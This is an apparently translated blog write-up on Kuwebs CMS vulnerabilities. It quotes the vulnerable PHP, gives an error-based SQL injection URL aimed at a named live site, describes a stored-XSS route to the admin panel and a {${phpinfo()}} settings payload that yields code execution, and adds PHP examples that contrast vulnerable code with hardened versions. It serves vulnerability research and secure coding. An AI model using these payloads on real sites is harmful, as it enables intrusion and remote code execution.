Kuwebs CMS: SQL injection combined with stored XSS to get a shell

Source: Internet
Author: User

Bored, I tested a website and found it was running the kuwebs source code. A Google search showed that someone had already published a vulnerability for it, but it seems to have been patched since. So I downloaded the package from the official site, and during the download my antivirus warned about a Trojan. Great: it seems someone has already left a backdoor on the official kuwebs website...

After a quick look through the code I found an injection point. The relevant code (job/resume.php, as quoted on the page; "......" marks where the original listing skips lines):

    <?php
    require_once '../inc/common.inc.php';
    $strSql = "select * from {$configTableHead}job where id='{$jobid}' and lang='{$kuWebsiteCurrLanguage}';";
    // $jobid goes into the query with no filtering at all, but it sits inside quotes:
    // with magic_quotes on it cannot be injected directly; MySQL GBK wide-byte injection could be an option.
    $kuArrJobInfo = $dbInstance->getOne($strSql);
    // $kuResumePost = $row['jobpost'];
    $kuPositionId = $kuArrJobInfo['type3'] ? $kuArrJobInfo['type3'] : ($kuArrJobInfo['type2'] ? $kuArrJobInfo['type2'] : $kuArrJobInfo['type1']);
    ......
    $arrMenuInfo = getMenuIdInfo($menuid);   // here is the injection point
    ......
    $topMenuId = '';
    if (count($kuMenuList[$kuProductShow['type3']])) $topMenuId = $arrMenuInfo['type3'];
    else if (count($kuMenuList[$kuProductShow['type2']])) $topMenuId = $arrMenuInfo['type2'];
    else if (count($kuMenuList[$kuProductShow['type1']])) $topMenuId = $arrMenuInfo['type1'];
    ......

    // function definition
    function getMenuIdInfo($id)
    {
        if ('' == $id || 0 > $id) return;
        global $configTableHead, $kuWebsiteCurrLanguage, $dbInstance;
        $strSql = "select id,fatherid from {$configTableHead}menu where id={$id};";
        $row1 = $dbInstance->getOne($strSql);
        if (!is_array($row1)) return;
        if (0 == intval($row1['fatherid'])) {
            $arrInfo['level'] = 1;
            $arrInfo['type1'] = $id;
            $arrInfo['type2'] = '';
            $arrInfo['type3'] = '';
            return $arrInfo;
        }
        ......   // rest of the function not shown on the page
    }

$menuid is concatenated into the SQL unquoted, so no quote character is needed to break out and magic_quotes is irrelevant. The only guard is '' == $id || 0 > $id, which rejects an empty value and negative numbers; a string that starts with a digit, such as "6 and (select ...)", passes both checks, because PHP compares it as the number 6 (or, on PHP 8, as a string that sorts above "0"). Proof of concept:

    http://www.bkjia.com/Kuwebs/job/resume.php?jobid=16&lang=cn&menuid=6 and (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)>0

This is the classic MySQL error-based trick: grouping on concat(version(), floor(rand(0)*2)) makes MySQL insert a duplicate key into its temporary group-by table, and the resulting "Duplicate entry ... for key" error message carries the value of version(). As long as database errors are echoed to the page, the data is read straight out of the error text.

That should have been the end of it, but kuwebs is annoying: if you leave the admin backend at its default path it nags you to change it, so the backend is usually moved and password protected; there is no hole in it, and it cannot be hit directly. XSS is all the rage now, so I followed the trend: looking for XSS, I found a stored XSS in the site's guestbook (message board). Reading the code, the input is not filtered at all. Getting a shell from there is easy. Either change the allowed upload suffix in the configuration, or go straight to Website basic settings > Basic information and enter {${phpinfo()}}. That payload only works because the setting is written into a PHP file inside a double-quoted string: PHP's {${...}} curly-brace syntax evaluates the expression inside it when that file is parsed, so phpinfo() (or whatever expression is put there) runs.
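As an added example (not code from the page or from kuwebs), the following PHP script reproduces the guard from getMenuIdInfo() and the unquoted query shape, checks that the page's payload passes the guard, runs the vulnerable and a hardened version against an in-memory SQLite table standing in for {$configTableHead}menu, and shows the fix: validate the id as a positive integer and bind it as a parameter. The 'ku_' prefix and the three menu rows are constructed; SQLite has no rand(0)/group-by error trick, so the live queries use a boolean-based payload instead of the page's error-based one.

```php
<?php
// Added example, not Kuwebs code. Assumes PDO with the sqlite driver.
// The table prefix 'ku_' and the menu rows below are made up.

function guardPasses($id): bool
{
    // Exactly the check in the original: only '' and negative values fail.
    return !('' == $id || 0 > $id);
}

// Vulnerable shape: $id is spliced into the SQL text unquoted.
function getMenuIdInfoVuln(PDO $db, string $prefix, $id): array
{
    if (!guardPasses($id)) {
        return [];
    }
    $strSql = "select id, fatherid from {$prefix}menu where id={$id}";
    return $db->query($strSql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: accept only a plain positive integer and bind it, so the SQL text is constant.
function getMenuIdInfoSafe(PDO $db, string $prefix, $id): ?array
{
    if (!ctype_digit((string) $id) || (int) $id <= 0) {
        return null;                                   // rejected before any SQL runs
    }
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');   // prefix cannot be bound
    }
    $stmt = $db->prepare("select id, fatherid from {$prefix}menu where id = ?");
    $stmt->execute([(int) $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed stand-in for {$configTableHead}menu.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('create table ku_menu (id integer primary key, fatherid integer)');
$db->exec('insert into ku_menu values (1, 0), (6, 1), (7, 1)');

// The page's MySQL error-based payload passes the guard unchanged: PHP 7 compares it
// as the number 6, PHP 8 as the string "6 and ...", and neither is below 0.
$pagePayload = '6 and (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)>0';
var_dump(guardPasses($pagePayload));                                   // bool(true)

// Boolean-based payloads against the vulnerable query: the attacker controls the WHERE clause.
var_dump(count(getMenuIdInfoVuln($db, 'ku_', '6')));                                       // int(1)
var_dump(count(getMenuIdInfoVuln($db, 'ku_', '6 or 1=1')));                                // int(3): whole table
var_dump(count(getMenuIdInfoVuln($db, 'ku_', "6 and substr(sqlite_version(),1,1)='3'")));  // int(1): true branch leaks a fact

// Hardened version: a real id works, anything else never reaches the database.
var_dump(getMenuIdInfoSafe($db, 'ku_', '6'));          // row with id 6, fatherid 1
var_dump(getMenuIdInfoSafe($db, 'ku_', '6 or 1=1'));   // NULL
```

The cast alone is not enough if the prefix or column names are ever user-influenced, which is why the prefix is whitelisted separately: PDO placeholders can only carry values, never identifiers.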
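An added example (not kuwebs code) of the class of bug behind the {${phpinfo()}} trick: a settings writer that interpolates the value into a double-quoted string in a generated PHP config file, beside one that persists it with var_export(). The file names, the $config array and the 'sitename' setting are made up for illustration; the payload string is the one from the page.

```php
<?php
// Added example, not Kuwebs code. Shows why a setting written verbatim into a
// double-quoted PHP string executes {${expr}} on include, and a safe alternative.
// File names, the $config array and the 'sitename' key are assumptions.

function writeConfigUnsafe(string $file, array $settings): void
{
    $php = "<?php\n";
    foreach ($settings as $k => $v) {
        // The value lands between double quotes, so PHP's complex ("curly")
        // syntax {${expr}} is honoured when the generated file is parsed.
        $php .= "\$config['{$k}'] = \"{$v}\";\n";
    }
    file_put_contents($file, $php);
}

function writeConfigSafe(string $file, array $settings): void
{
    // var_export() emits single-quoted literals with \ and ' escaped; single-quoted
    // strings are never interpolated, so the value stays data.
    file_put_contents($file, "<?php\nreturn " . var_export($settings, true) . ";\n");
}

$dir     = sys_get_temp_dir();
$payload = '{${phpinfo()}}';          // what gets typed into "basic information"

// Unsafe writer: the generated file is valid PHP that calls phpinfo() when included.
writeConfigUnsafe("$dir/cfg_unsafe.php", ['sitename' => $payload]);
echo file_get_contents("$dir/cfg_unsafe.php");   // $config['sitename'] = "{${phpinfo()}}";

ob_start();
@include "$dir/cfg_unsafe.php";      // @ hides the undefined-variable notice the trick leaves behind
$out = ob_get_clean();
var_dump(strpos($out, 'PHP Version') !== false);   // bool(true): phpinfo() executed

// Safe writer: the same input comes back as an inert string.
writeConfigSafe("$dir/cfg_safe.php", ['sitename' => $payload]);
$cfg = include "$dir/cfg_safe.php";
var_dump($cfg['sitename'] === $payload);           // bool(true): stored, not executed

unlink("$dir/cfg_unsafe.php");
unlink("$dir/cfg_safe.php");
```

Any code path that serialises user input into PHP source has this problem; var_export() (or storing settings as JSON/INI outside the PHP parser entirely) removes the interpolation surface, whereas escaping only the double quote does not, since {${...}} contains none.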

